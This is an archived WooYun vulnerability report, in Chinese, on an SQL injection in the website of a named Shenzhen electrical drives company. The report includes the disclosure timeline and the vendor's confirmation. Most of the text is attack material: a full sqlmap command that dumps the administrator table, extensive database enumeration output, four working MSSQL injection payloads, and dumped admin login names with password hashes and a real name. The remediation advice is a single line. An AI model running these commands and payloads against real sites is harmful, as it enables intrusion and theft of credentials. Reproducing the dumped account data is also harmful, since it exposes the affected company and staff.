乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-11: 厂商已经确认,细节仅向厂商公开 2015-11-21: 细节向核心白帽子及相关领域专家公开 2015-12-01: 细节向普通白帽子公开 2015-12-11: 细节向实习白帽子公开 2015-12-26: 细节向公众公开
深圳市正弦电气股份有限公司成立于2003年4月,注册资本6450万元。公司专注于电气传动自动化产品的研发、生产和销售,服务于中高端设备制造商和系统集成商。正弦电气是国家高新技术企业和深圳知名品牌企业,公司坚持技术领先和产品创新战略,为客户量身定制专用产品和解决方案,致力于成为行业细分市场的领导者。公司不断提升企业综合竞争力,注重自主技术革新,长期吸纳和储备高端技术人才,引进国际先进的运营和研发管理流程,实行严格的质量过程管控。公司拥有规模化的先进检验检测设备、实验设备和生产设备,能够完全满足低、中压工控产品的研发、测试和生产,年产能超12万台。变频器、伺服、一体化控制器等产品屡获殊荣,在中国大陆市场拥有良好的行业口碑,并远销东南亚、中东、俄罗斯等地。公司产品全部拥有自主知识产权,经过国家权威机构的检验和产品登记,通过CE认证,质量管理体系通过ISO9001认证。公司在全国各地设立了4个仓储和物流中心、12个区域服务中心、19个营销办事处,常驻营销人员和技术服务工程师,为客户提供专业便捷的服务。
地址:http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43
python sqlmap.py -u "http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43"-p lcid --technique=BEQU --random-agent --batch -D sq_sinee2013hk -T Whir_Sec_Users -C LoginName,Password,UserId,Email,RealName,LastLoginIP --dump
Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 70009 |
Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 67941 || sys.sysmessages | 67941 |
Database: sq_sinee2013hk+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.Whir_Cmn_Area | 3260 || sq_sinee2013HK.Whir_Cmn_Area | 3260 || sq_sinee2013HK.Whir_Sec_Resources | 1015 || dbo.Whir_Sec_Resources | 1011 || sq_sinee2013HK.Whir_Ext_Upload | 859 || sq_sinee2013HK.Whir_U_Jobs_JobRequest | 751 || dbo.Whir_Ext_Upload | 708 || dbo.Whir_Dev_Field | 612 || sq_sinee2013HK.Whir_Dev_Field | 612 || dbo.Whir_U_Jobs_JobRequest | 511 || dbo.Whir_Sec_RolesInResources | 380 || dbo.Whir_Sec_RolesInResources | 380 || sq_sinee2013HK.Whir_Sec_RolesInResources | 380 || sq_sinee2013HK.Whir_Sec_RolesInResources | 380 || sq_sinee2013HK.Whir_U_Content_Bak | 374 || sq_sinee2013HK.Whir_U_Content_Bak | 374 || dbo.Whir_U_Content_Bak | 268 || dbo.Whir_U_Content_Bak | 268 || sq_sinee2013HK.Whir_U_Product_Bak | 198 || sq_sinee2013HK.Whir_U_Product_Bak | 198 || sq_sinee2013HK.Whir_U_SinglePage_Bak | 131 || sq_sinee2013HK.Whir_U_SinglePage_Bak | 131 || dbo.Whir_Dev_FormDate | 128 || sq_sinee2013HK.Whir_Dev_FormDate | 128 || dbo.Whir_Dev_Menu | 127 || sq_sinee2013HK.Whir_Dev_Menu | 127 || dbo.Whir_U_SinglePage_Bak | 125 || dbo.Whir_U_SinglePage_Bak | 125 || sq_sinee2013HK.Whir_U_SalesNet_Bak | 114 || sq_sinee2013HK.Whir_U_SalesNet_Bak | 114 || dbo.Whir_U_Product_Bak | 112 || dbo.Whir_U_Product_Bak | 112 || sq_sinee2013HK.Whir_U_Download_Bak | 112 || sq_sinee2013HK.Whir_U_Download_Bak | 112 || dbo.Whir_U_Download_Bak | 73 || dbo.Whir_U_Download_Bak | 73 || dbo.Whir_Dev_Column | 72 || sq_sinee2013HK.Whir_Dev_Column | 72 || dbo.Whir_U_SalesNet_Bak | 58 || dbo.Whir_U_SalesNet_Bak | 58 || dbo.Whir_U_Product_Category | 44 || sq_sinee2013HK.Whir_U_Product_Category | 44 || dbo.Whir_Dev_FormOption | 42 || dbo.Whir_Dev_FormUpload | 42 || sq_sinee2013HK.Whir_Dev_FormOption | 42 || sq_sinee2013HK.Whir_Dev_FormUpload | 42 || dbo.Whir_Dev_ConfigStrategy | 37 || dbo.Whir_Dev_Module | 37 || sq_sinee2013HK.Whir_Dev_ConfigStrategy | 37 || sq_sinee2013HK.Whir_Dev_Module | 37 || sq_sinee2013HK.Whir_U_Content_Category | 36 || dbo.Whir_Dev_Model | 32 || sq_sinee2013HK.Whir_Dev_Model | 32 || dbo.Whir_U_Content_Category | 31 || dbo.Whir_U_Download_Category | 18 || sq_sinee2013HK.Whir_U_Download_Category | 17 || dbo.Whir_U_Jobs_Category | 12 || sq_sinee2013HK.Whir_U_Jobs_Category | 12 || dbo.Whir_Cnt_WorkFlowLogs | 11 || sq_sinee2013HK.Whir_Cnt_WorkFlowLogs | 11 || dbo.Whir_U_Jobs_Bak | 10 || dbo.Whir_U_Jobs_Bak | 10 || sq_sinee2013HK.Whir_U_Jobs_Bak | 10 || sq_sinee2013HK.Whir_U_Jobs_Bak | 10 || sq_sinee2013HK.Whir_U_Links_Bak | 10 || sq_sinee2013HK.Whir_U_Links_Bak | 10 || dbo.Whir_U_Links_Bak | 9 || dbo.Whir_U_Links_Bak | 9 || dbo.Whir_Dev_SubmitForm | 6 || sq_sinee2013HK.Whir_Dev_SubmitForm | 6 || dbo.Whir_Sec_Users | 4 || sq_sinee2013HK.Whir_Sec_Users | 4 || dbo.Whir_Cnt_Attached | 2 || dbo.Whir_Ext_Gather | 2 || dbo.Whir_Sit_SiteInfo | 2 || sq_sinee2013HK.Whir_Cnt_Attached | 2 || sq_sinee2013HK.Whir_Ext_Gather | 2 || sq_sinee2013HK.Whir_Sit_SiteInfo | 2 || dbo.Whir_Ext_AuditActivity | 1 || dbo.Whir_Ext_WorkFlow | 1 || sq_sinee2013HK.Whir_Ext_AuditActivity | 1 || sq_sinee2013HK.Whir_Ext_WorkFlow | 1 |+--------------------------------------------------+---------+Database: master+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| sys.messages | 67941 || sys.sysmessages | 67941 || sys.syscolumns | 10642 || sys.all_parameters | 6697 || sys.system_parameters | 6697 || sys.trace_subclass_values | 4722 || sys.trace_event_bindings | 3958 || sys.all_columns | 3740 || sys.system_columns | 3696 || sys.syscomments | 2744 || dbo.spt_values | 2346 || sys.all_objects | 1747 || sys.sysobjects | 1747 || sys.system_objects | 1741 || sys.database_permissions | 1641 || sys.syspermissions | 1641 || sys.sysprotects | 1640 || sys.all_sql_modules | 1589 || sys.system_sql_modules | 1589 || sys.database_recovery_status | 286 || sys.databases | 286 || sys.sysdatabases | 286 || sys.all_views | 284 || sys.system_views | 284 || sys.event_notification_event_types | 193 || sys.trace_events | 171 || sys.syscharsets | 114 || sys.allocation_units | 112 || sys.dm_db_partition_stats | 101 || sys.partitions | 101 || sys.system_components_surface_area_configuration | 98 || sys.xml_schema_facets | 97 || sys.xml_schema_components | 93 || sys.xml_schema_types | 77 || sys.trace_columns | 65 || sys.configurations | 62 || sys.sysconfigures | 62 || sys.syscurconfigs | 62 || sys.fulltext_document_types | 50 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || INFORMATION_SCHEMA.COLUMNS | 44 || sys.columns | 44 || sys.syslanguages | 33 || sys.systypes | 27 || sys.types | 27 || sys.securable_classes | 21 || sys.trace_categories | 21 || sys.fulltext_languages | 17 || sys.xml_schema_component_placements | 17 || INFORMATION_SCHEMA.SCHEMATA | 14 || sys.database_principals | 14 || sys.schemas | 14 || sys.sysusers | 14 || sys.xml_schema_attributes | 14 || sys.server_principals | 11 || sys.service_contract_message_usages | 11 || sys.server_permissions | 7 || sys.sysindexes | 7 || sys.indexes | 6 || sys.objects | 6 || sys.stats_columns | 6 || sys.stats_columns | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || INFORMATION_SCHEMA.TABLES | 5 || sys.index_columns | 5 || sys.sysindexkeys | 5 || sys.tables | 5 || sys.endpoints | 4 || sys.service_queue_usages | 3 || sys.syssegments | 3 || sys.xml_schema_namespaces | 3 || sys.database_files | 2 || sys.login_token | 2 || sys.service_contract_usages | 2 || sys.sql_logins | 2 || sys.sysfiles | 2 || sys.syslogins | 2 || sys.user_token | 2 || dbo.spt_monitor | 1 || sys.data_spaces | 1 || sys.database_role_members | 1 || sys.default_constraints | 1 || sys.dm_exec_requests | 1 || sys.dm_exec_sessions | 1 || sys.filegroups | 1 || sys.server_role_members | 1 || sys.servers | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysmembers | 1 || sys.sysprocesses | 1 || sys.sysservers | 1 || sys.tcp_endpoints | 1 || sys.via_endpoints | 1 || sys.xml_schema_collections | 1 || sys.xml_schema_model_groups | 1 || sys.xml_schema_wildcards | 1 |+--------------------------------------------------+---------+Database: msdb+--------------------------------------------------+---------+| Table | Entries |+--------------------------------------------------+---------+| dbo.backupfile | 70009 || dbo.backupset | 35004 || dbo.backupmediafamily | 1995 || dbo.backupmediaset | 1994 || dbo.restorefilegroup | 372 || dbo.restorefilegroup | 372 || dbo.restorehistory | 372 || dbo.suspect_pages | 3 |+--------------------------------------------------+---------+
Database: msdbTable: backupfile[25 columns]+------------------------+------------------+| Column | Type |+------------------------+------------------+| backed_up_page_count | numeric || backup_set_id | int || backup_size | numeric || create_lsn | numeric || differential_base_guid | uniqueidentifier || differential_base_lsn | numeric || drop_lsn | numeric || file_guid | uniqueidentifier || file_number | numeric || file_size | numeric || file_type | char || filegroup_guid | uniqueidentifier || filegroup_name | nvarchar || first_family_number | tinyint || first_media_number | smallint || is_present | bit || is_readonly | bit || logical_name | nvarchar || page_size | int || physical_drive | nvarchar || physical_name | nvarchar || read_only_lsn | numeric || read_write_lsn | numeric || source_file_block_size | numeric || state_desc | nvarchar |+------------------------+------------------+
Database: sq_sinee2013hkTable: Whir_Sec_Users[19 columns]+----------------+----------+| Column | Type |+----------------+----------+| CreateDate | datetime || CreateUser | nvarchar || Email | nvarchar || IsDel | bit || LastLoginIP | nvarchar || LastLoginTime | datetime || LoginName | nvarchar || LoginType | nvarchar || Password | nvarchar || RealName | nvarchar || Remarks | nvarchar || RolesId | int || Sort | bigint || State | int || SystemLanguage | int || SystemSkin | nvarchar || UpdateDate | datetime || UpdateUser | nvarchar || UserId | int |+----------------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: lcid (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace Payload: itemid=35&lcid=(SELECT (CASE WHEN (8371=8371) THEN 8371 ELSE 8371*(SELECT 8371 FROM master..sysdatabases) END)) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: itemid=35&lcid=43 AND 8230=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8230=8230) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113))) Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: itemid=35&lcid=(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1615=1615) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: itemid=35&lcid=43 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(101)+CHAR(67)+CHAR(115)+CHAR(112)+CHAR(121)+CHAR(118)+CHAR(67)+CHAR(85)+CHAR(113)+CHAR(71)+CHAR(113)+CHAR(69)+CHAR(90)+CHAR(107)+CHAR(84)+CHAR(75)+CHAR(119)+CHAR(80)+CHAR(115)+CHAR(118)+CHAR(88)+CHAR(78)+CHAR(102)+CHAR(90)+CHAR(106)+CHAR(90)+CHAR(97)+CHAR(115)+CHAR(69)+CHAR(76)+CHAR(75)+CHAR(72)+CHAR(65)+CHAR(79)+CHAR(100)+CHAR(97)+CHAR(82)+CHAR(88)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL-- ----web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005Database: sq_sinee2013hkTable: Whir_Sec_Users[4 entries]+-----------+------------------------------------------+--------+--------------------+----------+----------------+| LoginName | Password | UserId | Email | RealName | LastLoginIP |+-----------+------------------------------------------+--------+--------------------+----------+----------------+| admin | EED5873ACF981C43FE65257D87351443A50470AC | 6 | <blank> | 超级管理员 | **.**.**.** || sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** || sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** || sineehr | DEF021F935046446AE8639169852FC023440F5D9 | 7 | nieweiwei@**.**.**.** | 聂先生 | **.**.**.** |+-----------+------------------------------------------+--------+--------------------+----------+----------------+
增加过滤。
危害等级:高
漏洞Rank:10
确认时间:2015-11-11 15:00
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无